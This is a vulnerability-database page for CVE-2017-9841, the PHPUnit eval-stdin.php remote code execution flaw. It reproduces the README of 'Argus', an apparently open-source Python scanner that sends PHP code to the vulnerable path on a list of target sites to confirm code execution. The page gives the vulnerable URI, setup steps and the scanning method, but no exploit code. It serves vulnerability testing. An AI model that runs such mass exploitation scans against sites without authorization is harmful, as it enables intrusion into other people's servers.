CVE-2017-9841 PoC — PHPUnit 安全漏洞

Source

Associated Vulnerability

Title:PHPUnit 安全漏洞 (CVE-2017-9841)
Description:Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.

Description

"Argus" is a security tool designed to scan a list of websites for a known vulnerability in the PHPUnit framework, specifically the CVE-2017-9841 vulnerability. The tool attempts to exploit this vulnerability to verify its existence.

Readme

# Argus PHPUnit Scanner

<img width="358" height="358" alt="image" src="https://github.com/user-attachments/assets/e10d6173-c6cf-42ed-8ae6-c89d88493da9" />

A sophisticated security tool designed to detect PHPUnit eval-stdin.php vulnerabilities in web applications. Named after Argus Panoptes, the all-seeing giant with a hundred eyes from Greek mythology, this tool vigilantly watches over web applications to identify vulnerable installations of PHPUnit that could lead to remote code execution.

## 🔍 Features

- **Multi-threaded scanning** for efficient testing of multiple targets
- **Intelligent payload generation** with unique identifiers for accurate validation
- **Multiple vulnerability path checking** across common web application structures
- **Automatic response validation** to confirm actual vulnerabilities
- **Detailed logging** of vulnerable sites and errors
- **Colorful terminal output** with real-time progress tracking
- **Configurable timeout and retry mechanisms** for reliable scanning

## 📋 Requirements

- Python 3.6+
- Required Python packages (see installation section)
- List of target domains/IPs to scan

## 🚀 Installation

1. Clone the repository:
   ```
   git clone https://github.com/joelindra/Argus.git
   cd Argus
   ```

2. Install the required dependencies:
   ```
   pip install -r requirements.txt
   ```

   Or install dependencies manually:
   ```
   pip install requests colorama tqdm pyfiglet termcolor urllib3
   ```

## 💻 Usage

1. Create a text file containing a list of target websites (one per line)
2. Run the script:
   ```
   python3 argus.py
   ```
3. When prompted, enter:
   - The path to your target list file
   - The number of concurrent threads to use (default: 10)

4. The scanner will begin checking each site for the PHPUnit vulnerability

## 📊 Output

The script creates a `results` directory containing:
- `vulnerable_[timestamp].txt` - Detailed information about vulnerable sites
- `errors_[timestamp].txt` - Error logs for debugging

## 🔍 How It Works

Just as Argus Panoptes kept watch with his hundred eyes, this tool works by:
1. Attempting to access various paths where the vulnerable `eval-stdin.php` file is commonly found
2. Sending specially crafted PHP code that generates a unique fingerprint
3. Analyzing responses to confirm code execution
4. Recording confirmed vulnerabilities for further investigation

## ⚠️ Disclaimer

This tool is intended for legitimate security testing with proper authorization. Using this tool against systems without explicit permission may be illegal. The author is not responsible for any misuse of this software.

## 👨‍💻 Author

**Joel Indra**
- GitHub: [github.com/joelindra](https://github.com/joelindra)

## 📜 License

This project is licensed under the MIT License - see the LICENSE file for details.

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!